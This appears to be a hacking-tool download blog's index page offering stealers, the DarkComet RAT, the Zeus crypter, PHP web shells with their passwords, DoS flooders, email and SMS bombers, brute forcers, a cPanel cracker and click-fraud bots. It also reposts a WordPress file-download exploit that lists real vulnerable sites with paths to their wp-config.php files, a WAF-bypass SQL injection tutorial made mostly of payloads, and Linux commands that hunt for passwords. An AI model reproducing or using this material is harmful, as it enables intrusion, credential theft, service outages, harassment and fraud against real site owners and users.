Admin Login Grabber

Very easy to use:
1. just put your target
2. Click Grabb
3. Then result will show up
4. Just click on the result link and it will open automactlly
5. Enjoy
6. Give thanks if u liked it

Dont delete the albdevil.txt because without that it doesnt work.
U must have netframe4 installed to open it.

Virusscan: https://www.virustotal.com

Download: http://localhostr.com
Download: http://mediafire.com

Read More

Wordpress force download Local File Download

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress force download  Local File Download
[+]
[+] Exploit Author: Ashiyane Digital Security Team , Milad Hacking
[+]
[+] Date: 2015-02-22
[+]
[+] Google Dork 1 : inurl:wp-content inurl:force-download.php?file=
[+]
[+] Vendor Homepage : http://elouai.com/force-download.php
[+]
[+] Tested on:  Kali , Mozilla FireFox
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+]  Location : [localhost]/patch/force-download.php?file=[LFD]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Demo :
[+]
[+] http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
[+]
[+]
[+] http://www.bricomarchesollies.com/force-download.php?file=wp-config.php
[+]
[+] http://www.globalvoip.ca/force-download.php?file=wp-config.php
[+]
[+] http://www.hairline.it/force-download.php?file=wp-config.php
[+]
[+] http://vismatica.com/force-download.php?file=wp-config.php
[+]
[+] http://daileyortho.com/wp-content/uploads/patientforms/force-download.php?file=../../../wp-config.php
[+]
[+]
[+] http://www.cfpsych.org/wp-content/force-download.php?file=../wp-config.php
[+]
[+] http://www.islanegrawines.com/force-download.php?file=wp2/wp-config.php
[+]
[+] http://vismatica.com/force-download.php?file=/home/vismatic/public_html/wp-config.php
[+]
[+] http://www.kanazawa-adc.com/force-download.php?file=wp-config.php
[+]
[+] www.ciudadanosindependientes.es/wp-content/themes/ucin/includes/force-download.php?download=1&file=/homepages/40/d544309672/htdocs/wp-config.php
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Discovered By : Milad Hacking , Iliya Norton

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+]   Spcial Tnx To Admin   , packetstormsecurity.com
[+]
[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] 

Via-> intelligentexploit.com

Read More

Must Known Commands About System Information(Linux Host)

OS Version


cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

Kernel Version

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

Environment Variable

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Software & Service

ps aux
ps -ef
top
cat /etc/service

Which Service has r00t privilege? For further exploitation of vulnerable service 

ps aux | grep root
ps -ef | grep root

Installed Software & their version & running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
Service configuration
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

Appending Tasks?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Plain Text Password files?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Read More

b374k shell v2.8 Decode Version

b374k shell 2.8

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
Features :

• File manager (view, edit, rename, delete, upload, download, archiver, etc)
• Search file, file content, folder (also using regex)
• Command execution
• Script execution (php, perl, python, ruby, java, node.js, c)
• Give you shell via bind/reverse shell connect
• Simple packet crafter
• Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
• SQL Explorer
• Process list/Task manager
• Send mail with attachment (you can attach local file on server)
• String conversion
• All of that only in 1 file, no installation needed
• Support PHP > 4.3.3 and PHP 5

Requirements :

• PHP version > 4.3.3 and PHP 5
• As it using zepto.js v1.1.2, you need modern browser to use b374k shell. See browser support on zepto.js website http://zeptojs.com/
• Responsibility of what you do with this shell 

Password-> b374k

Download

click to begin

0.7MB .zip

Read More

Pamn IP Scanner

 Description

Pamn IP Scanner (or PIPS) was formerly titled "Nmap for Android." Fyodor, the inventor of Nmap, asked me to change the name and icon to reduce user confusion.This app is simply a wrapper around a cross-compiled Nmap binary built for your Android phone.
Source available at http://pips.wjholden.com/src/ in accordance with the GNU Public License.
_FAQ_
Q: I want to run Nmap myself from a terminal. Where are the binaries?
A: The binaries are (usually) saved in /data/data/com.wjholden.nmap/bin/.
Q: Is this a GPL violation?
A: I'm not a lawyer, but I don't think so. My sources are freely available and also licensed by the GPL. You are free to modify and redistribute my code provided you share those changes back, IAW the GPL. Free software is not always zero cost.
Q: Where is the source code?
A: Distributing source code along with Android applications is a bit impractical. Download the source code from http://nmap.wjholden.com/src/.
Q: Wait, you're not Fyodor!
A: This is NOT an official release from http://nmap.org, this is simply a front-end that calls to a precompiled Nmap binary.
Q: Do I need root?
A: No! You can use this program with or without root, although there are a few advantages to having root. I've seen a few problems with -O for Operating System fingerprinting (this would happen on desktop Linux as well). Non-root users will usually need to use the --system-dns argument.
Q: What's up with Atrix?
A: I don't know why, but this program has never worked with the Motorola Atrix, despite extensive efforts toward compatibility.
Q: Is NSE supported?
A: No, NSE/LUA are not supported for now, but it's definitely on the radar for a future revision. Some command-line arguments will not be available until then.

Download

click to begin

1.2MB .zip

Read More

Hotspot Shield VPN for Android apk (1.6.6)

 

Description

World's most popular VPN with over 200 million downloads. Try it for FREE! * Unblock any websites – unblock YouTube, unblock Facebook, and others such as Hulu, Netflix and BBC where it is blocked
* Give unrestricted access to mobile VOIP and messaging services such as Skype and Viber anywhere
* Secure your mobile WiFi connection with HTTPS encryption
* Prevent hackers from stealing your private information
* Browse the web privately & anonymously
* Compatible with Android OS version 2.x and 4.x

Credit-> torrapk.com

Download

click to begin

2.8MB .zip

Read More

Crack WiFi apk (1.04)

Description

Crack WiFi :- Don't Learn to hack, Hack to Learn
Application for hackersWanna learn How to Crack Wifi? Let us show you how!
NOTE: - This Application is only for education purpose and is 100%...

Get the latest version: 1.04

More Screen Shots

 

 

Download

click to begin

1.2MB .zip

Read More

Gr3eNoX Exploit Scanner SQLi/XSS/LFi/RFi v1.1

Updates

• XSS Scanner
• RFi Scanner Bug fixed
• Remove Duplicate algoritm chanded

Virus Scans: http://elementscanner.net//?RE=96825...d4ebb04cae10b5
https://www.virustotal.com/file/7c23...is/1339689371/
 
Download:  http://localhostr.com/kX3lVjuVOOmd 
or
Download: Mediafire.com

Read More

SSHDroid apk file version 1.9.4

Developer: Berserker
Version: 1.9.4
Requires Android: and up
Category: Tools & Personalizzation

You are going to download the SSHDroid apk file version 1.9.4, that is the latest version; you can install it on your Android device by following the short how-to that you'll find on this page. Connect through SSH to your device!SSHDroid is a SSH server implementation for Android.This applicatio......read more >

More information about the app

View the page of the app SSHDroid to have more information about the application, read user and Staff reviews, write your reviews and download a different version.

How to install an apk file on your Android device

Here following, how to do it in 4 steps:

1. Download the apk file to your device sdcard (if your device is connected to internet you can do it directly on it, otherwise you have to download the file on your pc and then transfer it to the sdcard of your device)
2. On your device press menu and go to Settings->Security, check that the "Unknown sources" voice is enabled. If not, enable it.
   In some old Android version the "Unknown sources" voice is located under Settings->Applications
3. Use a file manager, as for example Astro, to search the apk file in your sd card and click to install it
4. Now your app is installed.

How was your experiece with this app?

Once you have installed and used SSHDroid, it's very important that you rate and review it. You can describe your experience and give a score from 1 to 10 to the app. Your contribution will help other users to choose among the applications the better ones, and will help developers to improve their apps.
To write a review you need to access and use the button that you can find on the app page.

Important remarks

TorrApk team has absolute respect for developers work and thinks it's right that it have to be paid. For this reason on TorrApk you can find only apk files, original and unmodified, of applications that are given for free.

The team works hard to identify and eliminate as soon as possible all the apps deemed to be malicious that are absolutely not allowed on TorrApk.

If you think that SSHDroid does not comply these criteria, please report it immediately using the button to report an issue that you can find on app page.

Download

click to begin

1.0MB .zip

Read More

Metasploit Penetration Testing Cookbook

Set up a complete penetration testing environment using metasploit and virtual machines.
Learn to penetration-test popular operating systems such as Windows7, Windows 2008 Server, Ubuntu etc.
Get familiar with penetration testing based on client side exploitation techniques with detailed analysis of vulnerabilities and codes
Avail of exclusive coverage of antivirus bypassing techniques using metasploit
Master post-exploitation techniques such as exploring the target, keystrokes capturing, sniffing, pivoting, setting persistent connections etc.

Build and analyze meterpreter scripts in Ruby
Build and export exploits to framework
Use extension tools like Armitage, SET etc.

 <div class="abt-button">
      <a href="http://adf.ly/14063G">Download</a>
      <p class="up">click to begin</p>
      <p class="down">1.2MB .zip</p>
    </div>

Read More

Windows Forensic Analysis Toolkit

DOWNLOAD: http://www.mediafire.com/

Read More

C++ HOW TO PROGRAM 8TH EDITION BY PAUL DEITEL

Ebook Info:-
Publication Date: March 25, 2011 | ISBN-10: 0132662361 | ISBN-13: 978-0132662369 | Edition: 8
Size ("56.21 Mb")

Download : www.2shared.com
Download : mediafire

Read More

WAF Bypass Sql Injection(Tutorial)

Today I am going to show you how to bypass Web Application Firewalls ( WAF ). I will demonstrate from the Simpliest and most Basic Techniques to the Most Advanced ones!

NOTE: If you don’t know SQL Injection, read this first…

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).

Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….

(We get a 403 Error!)

Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:

You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

(First Method that can Bypass WAF)

However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:

You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….

(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” )

This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments:

Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

(( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.

Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:

Apart from the “UNION SELECT” other commands might be blocked.

Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version | version()

concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU

group_concat() | concat_ws()

Learning MySQL Really helps on such issues!

4) Misc Exploitable Functions:

Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):

Example:

This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4&#8230 ;

(If the Firewall removes the “*”, the result will be: 15+union+select….)

So, if you find such a silly function, you can exploit it, in this way!

[+] In addition to the previous example, some other bypasses might be:

-15+(uNioN)+(sElECt)….

-15+(uNioN+SeleCT)+…

-15+(UnI)(oN)+(SeL)(ecT)+….

-15+union (select 1,2,3,4…)

 (This tutorial was originally created by Akatzbreaker for Hackforums.net.   The original Post is here… )

Read More

DOS Attacks and Free DOS Attacking Tools

              The denial of service (DOS) attack is one of the most powerful attacks used by hackers to harm a company or organization. Don’t confuse a DOS attack with DOS, the disc operating system developed by Microsoft. This attack is one of most dangerous cyber attacks. It causes service outages and the loss of millions, depending on the duration of attack. In past few years, the use of the attack has increased due to the availability of free tools. This tool can be blocked easily by having a good firewall. But a widespread and clever DOS attack can bypass most of the restrictions. In this post, we will see more about the DOS attack, its variants, and the tools that are used to perform the attack. We will also see how to prevent this attack and how not to be the part of this attack.

What Is a Denial of Service Attack?

A DOS attack is an attempt to make a system or server unavailable for legitimate users and, finally, to take the service down. This is achieved by flooding the server’s request queue with fake requests. After this, server will not be able to handle the requests of legitimate users.

In general, there are two forms of the DOS attack. The first form is on that can crash a server. The second form of DOS attack only floods a service.


DDOS or Distributed Denial of Service Attack

This is the complicated but powerful version of DOS attack in which many attacking systems are involved. In DDOS attacks, many computers start performing DOS attacks on the same target server. As the DOS attack is distributed over large group of computers, it is known as a distributed denial of service attack.

To perform a DDOS attack, attackers use a zombie network, which is a group of infected computers on which the attacker has silently installed the DOS attacking tool. Whenever he wants to perform DDOS, he can use all the computers of ZOMBIE network to perform the attack.

In simple words, when a server system is being flooded from fake requests coming from multiple sources (potentially hundreds of thousands), it is known as a DDOS attack. In this case, blocking a single or few IP address does not work. The more members in the zombie network, more powerful the attack it. For creating the zombie network, hackers generally use a Trojan.

There are basically three types of DDOS attacks:

    Application-layer DDOS attack
    Protocol DOS attack
    Volume-based DDOS attack

Application layer DDOS attack: Application-layer DDOS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.

Protocol DDOS attack: A protocol DDOS attacks is a DOS attack on the protocol level. This category includes Synflood, Ping of Death, and more.

Volume-based DDOS attack: This type of attack includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.

There are many tools available for free that can be used to flood a server and perform an attack. A few tools also support a zombie network to perform DDOS attacks. For this post, we have compiled a few freely available DOS attacking tools.

Free DOS Attacking Tools

1. LOIC (Low Orbit Ion Canon)

LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.

It can be used simply by a single user to perform a DOS attack on small servers. This tool is really easy to use, even for a beginner. This tool performs a DOS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL of IP address of the server and the tool will do the rest.

You can see the snapshot of the tool above. Enter the URL or IP address and then select the attack parameters. If you are not sure, you can leave the defaults. When you are done with everything, click on the big button saying “IMMA CHARGIN MAH LAZER” and it will start attacking on the target server. In a few seconds, you will see that the website has stopped responding to your requests.

This tool also has a HIVEMIND mode. It lets attacker control remote LOIC systems to perform a DDOS attack. This feature is used to control all other computers in your zombie network. This tool can be used for both DOS attacks and DDOS attacks against any website or server.

The most important thing you should know is that LOIC does nothing to hide your IP address. If you are planning to use LOIC to perform a DOS attack, think again. Using a proxy will not help you because it will hit the proxy server not the target server. So using this tool against a server can create a trouble for you.

Download LOIC Here: http://sourceforge.net/projects/loic/




2. XOIC


XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways. Like LOIC, it comes with an easy-to-use GUI, so a beginner can easily use this tool to perform attacks on other websites or servers.

In general, the tool comes with three attacking modes. The first one, known as test mode, is very basic. The second is normal DOS attack mode. The last one is a DOS attack mode that comes with a TCP/HTTP/UDP/ICMP Message.

It is an effective tool and can be used against small websites. Never try it against your own website. You may end up crashing your own website’s server.

Download XOIC: http://sourceforge.net/projects/xoic/

3. HULK (HTTP Unbearable Load King)

HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.

It has a list of known user agents to use randomly with requests. It also uses referrer forgery and it can bypass caching engines, thus it directly hits the server’s resource pool.

The developer of the tool tested it on an IIS 7 web server with 4 GB RAM. This tool brought the server down in under one minute.

Download HULK here: http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html

Read More

The Best 50 Firefox Pentesting AddOns

If you are a pentester, ethical hacker or work in the IT security information space then you obviously need tools to perform penetration tests. There are a million different tools out there – all of which essentially fall under one of these categories:
Password cracking tools, such as ophcrack and John the Ripper
Network scanning software, such as the legendary Nmap or NetScanTools
Network vulnerability scanning tools, with a good example being QualysGuard
Network analyzer software, Cain & Abel, Wireshark and OmniPeek
Wireless network analyzer and software, such as Aircrack-ng and CommView
File search software (mainly for forensics), an example being FileLocator Pro
Web application vulnerability scanning software, for example Acunetix and WebInspect
Database vulnerability security scanning software, like SQLPing3 or AppDetective
Exploit software with a solid example being the age-old proven and tested Metasploit
As an information security professional, knowledge of how to use these tools is obviously a critical skill you must have.
If you are just starting your career and are studying an IT security certification then you will have to learn how to use these tools effectively. A solid plan is to become familiar with a Linux pentesting security distro – of which there are many.
OK! So we all love Firefox right? Good – because this list came from their addons section!
1. Access Me
The first tool on our list is called “Access Me” which examines vulnerabilities in applications. This allows a pentester/ ethical hacker etc to access network or computer system resources without being authenticated. In short, Access Me is used to test for Access vulnerabilities.
2. JavaScript Deobfuscator
This pentesting addon tells you what JavaScript files are running within an HTML page or other, even if it is obfuscated and generated elsewhere. Simply open the JavaScript Deobfuscator app from the Firefox Tools menu and watch the scripts being compiled or executed. Kinda similar to NoScript. Should add that if this addon is on all the time then all code will render slower so you are best advised to only use it when you need it.
3. SQL Inject ME
Good ole SQL Injection vulnerabilities can cause a lot of damage to a web application as any good pentester will tell you. A malicious user can possibly view records, delete records, drop tables and basically go ahead and gain access to your server. SQL Inject-Me is tests for this – i.e. SQL Injection vulnerabilities.
4. FoxyProxy
FoxyProxy is an old hat, been around for a while now. There is tons of help on setting this up – just hit up YouTube and take a look. For the complete newbies reading this, FoxyProxy is an advanced proxy management tool that can replace Firefox’s proxying capabilities, (which are pretty limited). There are others out there, such as SwitchProxy, QuickProxy or the infamous TorButton.
5. Key Manager
This pentesting tool allows for Key Generation, Certificate Enrolment and Authority Delegation. In summary you can see encryption keys that are generated when you visit secure websites. You can also create your own encryption keys.

Read More

Basic Security Testing with Linux

With This Chapers !

Chapter 1 – Introduction

Part 1: Installing and Basic Overview

Chapter 2 – Installing Kali with VMWare Player

Part 2 – Metasploit Tutorial

Chapter 3 – Introduction to Metasploit

Chapter 4 – Meterpreter Shell

Part 3 – Information Gathering & Mapping

Chapter 5 – Recon Tools

Chapter 6 – Shodan

Part 4 - Attacking Hosts

Chapter 7 – Metasploitable Tutorial – Part One

Chapter 8 – Metasploitable – Part Two: Scanners

Chapter 9 – Windows AV Bypass with Veil

Chapter 10 – Windows Privilege Escalation by Bypassing UAC

Chapter 11 – Packet Captures and Man-in-the-Middle Attacks

Chapter 12 – Using the Browser Exploitation Framework

Part 5 - Social Engineering

Chapter 13 – Social Engineering

Chapter 14 – The Social Engineering Toolkit

Chapter 15 – Subterfuge

Part 6 – Password Attacks

Chapter 16 – Cracking Simple LM Hashes

Chapter 17 – Pass the Hash

Chapter 18 – Mimikatz Plain Text Passwords

Chapter 19 – Mimikatz and Utilman

Chapter 20 – Keyscan and Lockout Keylogger

Chapter 21 – HashCat

Chapter 22 – Wordlists

Chapter 23 – Cracking Linux Passwords

Part 7 – Router and Wi-Fi Attacks

Chapter 24 – Router Attacks

Chapter 25 – Wireless Network Attacks

Chapter 26 – Fern WIFI Cracker

Chapter 27 – Wi-Fi Testing with WiFite

Chapter 28 – Kismet

Chapter 29 – Easy Creds

Part 8 – Raspberry Pi

Chapter 30 – Installing Kali on a Raspberry Pi

Chapter 31 – WiFi Pentesting on a Raspberry Pi

Part 9 - Defending your Network

Chapter 32 – Network Defense and Conclusion

Download

click to begin

5MB .zip

Read More

Injector Team Shell

Special function of Injector Shell 
- private symlink bypass  
- auto cpanel crack


Pastebin Download : 

Download

click to begin

1.2MB .zip

Password ---> inj3ct0r

Read More

THC Stealer v1

 

Coded by Ganja 2013
Refud by Ravens7

Download

click to begin

2.5MB .zip

Read More

Zeus Crypter

zeus crypter.exe is a malicious Trojan virus that will mess up the targeted PC completely. Once infected, zeus crypter.exe virus modifies crucial system files to set itself run automatically, or tries to pretend to be safe executable files. Thus, some antivirus may not detect zeus crypter.exe virus in time.

zeus crypter.exe virus is able to open backdoor processes to allow remote accesses from cyber criminals. It will be extremely dangerous that remote hacker can control your PC and steal whatever important data stored in the system some day without any notification. Users¡¯ bank information will be known by remote hacker if zeus crypter.exe virus in the system, it can scan system files quickly, record profitable data and transfer to remote server. What¡¯s more, zeus crypter.exe virus is capable of infecting some files, if the infected files that contain important data cannot be deleted, security programs may keep reporting alerts. In order to keep your system and personal data safe, you must remove zeus crypter.exe virus as soon as possible.

Download

click to begin

1.2MB .zip

Read More

RA1N DoSer v4 (lite)

Flooding

• UDP
• TCP
• SYN

Features

• Port Scanning (100+ times faster than RDv3)
• History
• Favorites
• Awesome CPanel
• Defualts for input fields for flooding
• and more!

Tech Specs:

• Over 25kbs a UDP Flood
• Cusstomizable SYN Flooding (using exploitations)
• Encrypted source (noobs piss me off)
• TCP Flooding (very efficient)
• program averages only 5,000 kbs of processing

[x] Download ->
Code:  http://dl.dropbox.com/u/32095117/RA1N/RDv4/RDv4.exe
[x] Virusscan ->
Code: https://www.virustotal.com/file/7fd5d9978a966827b74426a657c8b66abf9604a4742b2cf1718f87136e99fb23/analysis/1351546234/

credit : RA1N

Read More

Adf.ly Auto Clicker 2014

Here is another adf.ly bot which is also working without any issue. Recently we shared a different adf.ly bot which is still working like a charm. But some how If you are facing any problem with that bot try using new proxies list, download it from below link. If still there is any problem try this bot. If you are new visitor to our site then kindly use this bot.
This bot is better than previous bot because it saves your bandwidth. However it is very easy to use this bot, lets see how to use this Adf.ly Bot

Steps To Use Adf.ly Auto Clicker 2014

●Download the new adf.ly auto clicker and proxies.

●Run adf.ly auto clicker.

●Select enable proxies.

●Now load the download proxies.

●Now right click on blank space/header of bot and select enter link.

●Finally right click and select start, your links will be clicked automatically.

●Now minimize the bot and let it do its work!

Download Adf.ly Auto Cliker 2014[Server 1]

Download Adf.ly Auto Clicker 2014[Server 2]

Download Fresh Proxies

Kindly share this post with your friends if it helped you. Visit daily for more adfly hacks.

source: adflyhacking.blogspot.com

Read More

Facebook Priv8 Brute Force 2015

#---------------------------------------------- #
# Facebook Priv8 Brute Force 2015 
# user : AnonGhost
# password : ILOVEISLAM
# Coded by : Mauritania Attacker&Noname-Haxor&Donnazmi   #
# Greetz : All AnonGhost Members   and FANS !              #
# This Tool Is For Erasing Israel in Fb  
# Contact : www.twitter.com/ungku_nazmi on twitter       #
# --------------------------------------------- #
#################################################


Make Sure Your Internet Is GOOD .
if you got error similar like this
-(Error! .Net Framework 4 )
-Update Your .Net Framework
-and run the pogram :)

Download

click to begin

1.5MB .zip

Read More

The Basics of Hacking and Penetration Testing

The Basics of Hacking and Penetration Testing, Second Edition - Ethical Hacking and Penetration Testing Made Easy
2013 | ISBN: 0124116442 | English | Pages: 225 | PDF | 3.48 Mb

The Basics of Hacking and Penetration Testing, 2nd Ed. serves as an introduction to the steps required to complete a penetration test or perform an ethical hack from beginning to end. No prior hacking experience is needed. You will learn how to properly utilize and interpret the results of modern day hacking tools, which are required to complete a penetration test.

Read More

Download DarkComet RAT v5.3.1

Product version : v 5.3.1 FIX 1 fwb
Directed and Coded by : Jean-Pierre LESUEUR ( DarkCoderSc )
Coded using : Pascal / Delphi ; Assembler x86 ; PHP (Trace route; get IP WAN)

[Curent Changes 5.3]

- [FIX ] HTTP Flood more efficient
- [FIX ] In settings the last theme is correctly set in the combobox
- [FIX ] Auto SIN Refresh ratio successfully saved in config.ini
- [GUI ] Client Settings GUI changed, it is now more user friendly and fit with the rest of DarkComet RAT Design
- [GUI ] EULA At startup is more beautiful
- [GUI ] No IP Gui revised
- [GUI ] User group Gui revised
- [FUNC] Search for update added in settings
- [GUI ] Keylogger GUI revised
- [FIX ] Now desktop correctly save snapshots (if option enabled)
- [DEL ] Delete in full editor (read only, archived, tempory) attributes to avoid some stub problems if used
- [FIX ] Users list flags support now Serbia Country (Republic of Serbia)
- [FIX ] VIP Lounge price and URL fixed
- [FUNC] HOT, Now you can chose wich functions you need in the control center, and not be bloated with functions you might never used. (In settings window)
- [FIX ] FTP Upload Keylogger Logs bug fixed
- [FUNC] FTP Wallet added in settings, it allow you to setup and test your FTP accounts for compatible DarkComet RAT FTP Functions
- [FUNC] FTP Wallet is now linked to the Edit Server keylogger FTP Managment
- [FUNC] Now you can upload files from file manager to one of your FTP account (compatible with the FTP Wallet)

Read More

Sql Scanner & Admin Panel Finder

Download

click to begin

1.4MB .zip

Read More

GT Mailer E-Mail Bomber v3.4 SMS Bomber

This mail bomber has a maximum of 500 emails sent to the inbox of the popular email providers (Gmail/Yahoo/Hotmail)

It works by sending from an existing account (no it isn't backdoored, I do not play that game.) therefore it isn't exactly anonymous, although creating a burn account would help with this.

I added a SMS Bomber in v2.0. It features the same 500 limit as GT Mailer and supports messages sent to 67 wireless carriers in North America and 70 wireless carriers Internationally!!


In my testing, the email from which the SMS messages are sent DOES show up in the received SMS, again be aware of this!

The Login credentials will not work if you have 2 - layer verification setup for gmail. (if you receive a text with a code to login to gmail)

Also note the following results for the SMS Bomber:

1- Gmail no VPN = Works
2- Gmail With VPN = Fails
3- Hotmail no VPN = Works
4- Hotmail with VPN = Works

To use the SMS Bomber:
1* Enter your Gmail or Hotmail handle (not the full address, eg; user@gmail.com = wrong || user = correct) and your login credential. This applies to both apps as of v2.2
2* Choose your email service.
3* Enter the subject you want.
4* Enter the cellular number of the recipient.
5* The recipient's carrier (unfortunately this is where you need to know some info on the person your looking to spam) you can look up the cellular number HERE
6* Lastly the message and how many times you want it sent.

Download

click to begin

1.6MB .zip

Read More

Black Worm Generator v3.5

Download

click to begin

2.2MB .zip

Read More

Wordpress Brute Force

   

 A Brute Force Attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.This tool can make brute force login to wordpress website.

Download

click to begin

1.2MB .zip

Read More

Joomla Bruter

Download

click to begin

1.3MB .zip

Read More

I-47 v1.3 Shell

Download

click to begin

0.6MB .zip

Read More

Dark Shell

Download

click to begin

0.65MB .txt

Read More

Website Clicker 2014 (Free Edition) - Free Download

Automatically Website Clicker, Website Viewer, Website Visitor, Website Traffic Generator
You can also turn "Insvisible" OFF and use it as Normal Web Browser
Automatically Website Refresh/Reconnecter every "15 Seconds"
You can Open this Tool Unlimited with Different URL (Website)
Please Download and install (if not already installed) Flash Player for "Internet Explorer"

Download

click to begin

1.1MB .zip

Read More

Multi IRC Bot 2014 (Free Edition)

Information:
This is a Standalone IRC Bot Tool which can Chat in most IRC Chats.
You can change the IRC Server and Port if you like. (Flexible)
Please do not Abuse this Tool with Spamming, you can Text it on your own Channel.

Read More

Vulnerable Hunter 2014

  

Hello,

this is Vuln Hunter 2014 - Website Vulnerability Scanner made by Pooria Sharaffodin

Features:
Dork Search
Dorks Included
Custom Dork Search
Live Website Injection Viewer
Live Url Injection Viewer
Live Vulnerability Found Counter
Mass SQLi ((i)Injection) Scanner
Mass XSS Injection Scanner
Mass /etc/passwd Injection Scanner
Single SQLi Scanner
Single XSS Scanner
Single /etc/passwd Scanner
SQLi - Commands, Examples
XSS - Commands, Examples
/etc/passwd - Commands, Examples
Send to SQLi, XSS, etc/passwd Scanner
Save SQLi, XSS, etc/passwd Vulnerabilities
Clear SQLi, XSS, etc/passwd Vulnerabilities
Add, Remove Dork - Dorklist

Read More

MadScan Wordpress Joomla Vulnerable Scanner

 Download here->http://adf.ly/xgXZZ

Read More

Cpanel Nightmare(C panel cracking tool)

The public version of C-panel cracking tool of coder bk.
Password:::: pentest
Download here->http://adf.ly/1gSGz0

Read More